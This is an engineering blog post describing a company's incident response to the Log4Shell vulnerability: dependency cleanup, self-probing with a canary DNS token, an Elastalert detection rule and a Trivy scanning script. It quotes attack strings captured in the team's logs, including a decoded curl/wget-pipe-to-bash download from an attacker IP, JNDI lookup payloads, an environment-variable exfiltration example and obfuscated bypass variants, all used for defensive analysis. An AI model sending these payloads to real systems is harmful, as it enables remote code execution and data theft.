Managing zero-day vulnerabilities in a Mobile Core Platform - Log4j CVE-2021-44228

By Jonnathan Griffin - Security Engineer, Yan Grunenberger - Software Engineer, 2021-12-17

Learn how Working Group Two managed to mitigate a zero-day vulnerability across a global cloud-based mobile network.


Table of Contents

Friday

Saturday

Monday

What worked well and could be improved
Staying secure
We are hiring

Friday

On Friday, December 10th, Working Group Two and many others became aware of a critical severity zero-day exploit, CVE-2021-44228, known as “Log4Shell” in the Log4j library, which is widely used in numerous systems around the internet. We immediately opened a security incident and have been actively taking steps to mitigate and monitor the situation.

Mitigating 3rd party vulnerabilities is an ability that Working Group Two has prepared for. The first step in doing so is to assess the impact of the Log4j library across our microservice architecture.

We knew that all versions of Log4j 2.0-beta9 <= Apache log4j <= 2.14.1 were affected.

Code

Naturally, the first place to look was our codebase and answer the question, do we have java microservices using log4j? Our core application code exists in a monorepo. Having a monorepo makes it easier as there is one place to look. In addition, we use bazel which helps for managing dependencies. After a quick scan through our repo, we found that we had a vulnerable version of log4j as a dependency, but was not used by a service. We cleaned this up and removed Log4j entirely.

Docker Vulnerability Scan Day 1

We use Trivy as our Docker vulnerability scanner. We have integrated this scanner as part of our docker image registry.

At a first pass, all scans were negative across our infrastructure and we thought we were in the clear. We later identified that this was a false positive as Trivy’s database is only updated every 6 hours and did not include CVE-2021-44228 for around 48 hours after first identified.

Saturday

Checking our infrastructure ourselves with DNS requests

At that moment, we want to also evaluate ourselves if we are vulnerable. The early report of log4j exploitation showed that attackers were abusing the user-agent field of public endpoints, such as HTTP endpoints. Those endpoints are often logged using the Apache format, which exposes the user agent and the URL in the logs. In turn, those logs could be post-processed via a component using Log4j.

One harmless way to detect vulnerability is to exercise the JNDI resolver, that is to say, to have log4j perform the DNS request toward the java object. Thinkst folks are providing Canary Tokens service in a free tier fashion, and inside, there is a DNS token:

If a DNS resolution is performed on the unique DNS hostname, we would get a callback or an email. After generating the token, we quickly proceed to probe our infrastructure:

curl https://docs.wgtwo.com  -A "\${jndi:ldap://randomlygeneratedhostname.canarytokens.com/a}"

After executing the command, we shortly received the notification from CanaryTokens. It means one of our elements of the infrastructure stack is relying on log4j. Nevertheless, we need to assess if the vulnerability is exploitable, so we check the Infosec literature.

JNDI stands for Java Naming and Directory Interface - it is a system designed to look up for data and resources, i.e. such as Java bytecode. It might sound wrong to the 2021 engineers but back in 2000 Java RMI, CORBA etc were very trendy concepts for discovering and executing code in a dynamic fashion - think like Javascript or ActiveX applets in the browser world.

Going back to our problem, we quickly found this Rogue JNDI. This is basically an exploit generator that creates a fake LDAP server, replying with Java class objects that will be executed by log4j on object retrieval. After building a quick docker image, we ran this exploit on an external host and execute several calls to check all the proposed types of payload:

In particular, RemoteReference did not yield to any execution, which means probably the JVM used to run the affected Java component is either too recent or not configured to execute code via known remote methods. This gives us some time, but we are still exposed to information leakage as an attacker can still exfiltrate env variables via DNS queries - i.e. log4j would resolve environment variables and would embed them in a query, such as:

${jndi:ldap://${env:JAVA_VERSION}.dnsresolver.foo}

Then, we should proceed to: 1) Identify if the affected components are in our stack or in the cloud provider 2) Apply mitigation

For (1), we started to observe all our log components and run network monitoring for a specific TCP flow on a controlled external host (i.e. running tcpdump toward a specific IP/port). We quickly noticed that a pod for one of DaemonSet was the culprit. This component was embedding logstash which is using Java and log4j.

Assuming this was the only element, we proceed to apply mitigation: We discard the WAF approach as too complex and not providing enough coverage. We indeed saw later obfuscation of the jndi:ldap string used to trigger the vulnerability. The environment variable / JVM options were the quickest to deploy, but yielded no result. Later on, the Elastic Log4j CVE dedicated page mentioned that the mitigation was ineffective. Java class removal consists of removing the Java class from the classpath so that the component will not be able to resolve resources dynamically. Thanks to the use of Docker image, we can simply alter the build recipe to perform the removal and redeploy the image. In a couple of minutes, we can deploy the new logstash component.

Log Analysis and Alerting

Just after the zero-day was released, we identified an indicator of compromise (IoC) within our logs which is helpful for security forensics. ${jndi

Cloudflare wrote a great blog post about the traffic they have seen when updating their firewall rules for preventing Log4j exploits.

For us, we wanted to achieve something similar and ensure that we can monitor our infrastructure from malicious actors probing our public infrastructure. We have centralized logging that acts as our Security Incident Event Monitoring (SIEM) solution. This is based on ElasticSearch, which by the way, was another service we needed to patch because of Log4j, identified by AWS Security Bulletin.

To get some ChatOps alerts in slack we use an open-source tool called Elstalert. This tool provides the ability to actively monitor and alert based on data within ElasticSearch. We use this for audit and security alerts within our applications and infrastructure.

To get started, we built the following Elastalert rule:

log4j.yaml: |-
  ---
  name: "log4j cve"
  index: logstash-*
  type: any
  realert:
    minutes: 15
  filter:
  - query:
    - query_string:
        query: "\"jndi:ldap\""
  query_delay:
    minutes: 5
  query_key: "message"
  alert_text_type: alert_text_only
  include : ["kubernetes.container.name","message"]
  alert:
  - "slack"
  alert_text: "
  *Container* : {0}\n
  *Message* : {1}"
  alert_text_args: ["kubernetes.container.name","message"]
  slack_channel_override: "#cve-2021-44228"
  slack_emoji_override: ":unlock:"
  slack_msg_color: warning
  slack_title: Security RCE attempt for CVE-2021-44228

We quickly then began to receive alerts of probing attempts across our environments.

The following alerts are unsuccessful exploit attempts our infrastructure.

Let’s take a closer look at some of these exploit attempts to see if we can learn anything..

[2021-12-10T14:05:52.612 Z] "GET / HTTP/1.1" 307 - 0 0 0 - "45.155.205.233" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81NC4yMTcuMTczLjgzOjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC81NC4yMTcuMTczLjgzOjQ0Myl8YmFzaA==}" "34b61b2d-28f6-4e89-9baf-7cd3b4e71698" "54.217.173.83:443" "-"

This request was hitting our public API gateway with a base64 encoded payload. Decoding this payload we can see what the actor was trying to accomplish:

base64

KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81NC4yMTcuMTczLjgzOjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC81NC4yMTcuMTczLjgzOjQ0Myl8YmFzaA==

base64 decoded

(curl -s 45.155.205.233:5874/54.217.173.83:443||wget -q -O- 45.155.205.233:5874/54.217.173.83:443)|bash

If this attack was successful, we can see that the actor is attempting to download a malicious exploit first with curl, then attempt with wget and then execute with the downloaded payload with bash. If this attack was successful we would have received an alert from our Host-based Intrusion Detection System (HIDs) from Falco. In addition, it shows the importance of ensuring our images are distroless, without bash and OS dependencies, and blocking egress network traffic if possible, as this would also prevent such an attack.

Looking at more attempts, we started to see probing attempts using a 3rd party service using Interactsh.

16/Dec/2021:06:11:07 +0000] "GET /?x=${jndi:ldap://${hostName}.c6s8ou15g22ssten8u8gcg7po6oyo6dj6.interactsh.com/a} HTTP/1.1" 302 0 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6s8ou15g22ssten8u8gcg7po6oyo6dj6.interactsh.com}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6s8ou15g22ssten8u8gcg7po6oyo6dj6.interactsh.com}" 685 0.015 [products-developer-portal-8080] 100.98.133.224:8080 0 0.014 302 548d1132926fa0bc9904e12523d2f250 [${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6s8ou15g22ssten8u8gcg7po6oyo6dj6.interactsh.com}, 173.249.19.100]

We see a lot of requests calling DNS as a mechanism to detect if a system is vulnerable.

[2021-12-14T22:57:36.722Z] "GET / HTTP/1.1" 307 - 0 0 0 - "51.105.55.17" "/${jndi:ldap://45.83.193.150:1389/Exploit}" "7c9223d6-2c81-491d-8564-10742cc90a9c" "54.75.196.220" "-"

In our Tokyo region, we started to see a lot of requests from x00.it domain.

[14/Dec/2021:17:37:59 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-0c1679670abeeb68eeabd98981713eea_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-0c1679670abeeb68eeabd98981713eea_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-0c1679670abeeb68eeabd98981713eea_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_search.log4jdns.x00.it%2F%7D HTTP/1.1" 401 39 "${jndi:ldap://divd-0c1679670abeeb68eeabd98981713eea_${date:YYYYMMddHHmmss}_https_Referer.log4jdns.x00.it/}" "${jndi:ldap://divd-0c1679670abeeb68eeabd98981713eea_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.x00.it/}" 4496 0.255 [monitoring-mki-lab-grafana-80] 100.115.164.63:3000 39 0.001 401 d7fa702ee8cc73793707ca6720c57639 [194.5.73.6]

In the coming weeks we will continue to monitor the probes across our public infrastructure to see how they evolve.

Monday

Docker Vulnerability Scans

Next, we wanted to ensure there was not an application running in our Kubernetes clusters with a vulnerable version of Log4j. We know from this resource that there are many open source applications that are vulnerable. To ensure we are not running a tool that is vulnerable, we used Kubernetes API with kubectl and Trivy, a scanner for vulnerabilities in container images.

First, we built a small POC to ensure that Trivy can identify the CVE-2021-44228.

❯❯❯ brew install aquasecurity/trivy/trivy
❯❯❯ trivy image birdyman/log4j2-demo:1.0.0-12 | grep CVE-2021-44228 
| org.apache.logging.log4j:log4j-api                     | CVE-2021-44228   | CRITICAL | 2.10.0            | 2.15.0                         | Remote code injection in Log4j                                                  |

Now that we know Trivy works, let’s create a small bash script to call Kubectl and Trivy and grep for the Log4j CVE.

trivy-scan-cve.sh CVE-2021-44228

#!/usr/bin/env bash

VULN=$1

echo "Scanning $1..."

imgs=`kubectl get pods -A -o jsonpath='{range .items[*]}{.spec.containers[*].image}{" "}' | tr " " "\n" | sort -u`
for img in ${imgs}; do
  echo "scanning ${img}"
  result=`trivy image --severity CRITICAL ${img}`
  if echo ${result} | grep -q "$1" ; then
    echo -e "${img} is vulnerable, please patch!"
  fi
done

We ran the above script across all of our Kubernetes clusters. This was helpful as we then found some additional test services which included the vulnerable Log4j library. These vulnerable services were based on 3rd party open-source applications, therefore we were not able to identify them earlier when looking just through the code dependencies. We took the necessary actions to remediate these services and investigate that there was no malicious traffic from these pods.

Monitoring Vendors

It is important to note that because we operate in the cloud and also use some vendor components in our mobile core network, we needed to ensure these core components were not affected by Log4j vulnerabilities. In our case, we followed the AWS and Cisco Security Bulletins and update our components when required.

What worked well and could be improved

During this incident management we have gathered great learnings in the way.

First of all, our GitOps and centralized software repositories have been critical to remediate very quickly to the vulnerability, enabling us to quickly deploy across our entire infrastructure new components, without interrupting operations or losing any log information in the process.

Second, while our monorepo and automated scan helped us a lot to identify vulnerable components, they still depend on the availability of up-to-date information. During that incident, we noticed that it was often difficult to rely on those 3rd party components to address a 0day risk. Therefore, we will rely on improving our defense-in-depth by verifying that unnecessary code execution is systematically disabled in our runtimes, improve the sanity of our container images by adopting best practices of the cloud industry.

Staying secure

All in all, it is important that we have the ability to plan, identify, contain and prevent zero-day vulnerabilities such as Log4j. We only spoke about some of the controls we have in place, but we are continuing to explore new technologies and mechanisms to ensure we build and maintain a secure environment.

We are hiring

If you are a Security Engineer looking for a new challenge to make a secure mobile core platform, come and say hi. https://wgtwo.jobs.personio.de/job/423396?display=en

Suggest a change

Working Groups Two's blog is open-source and hosted on GitHub. Anyone is free to suggest changes through GitHub.

Suggest a change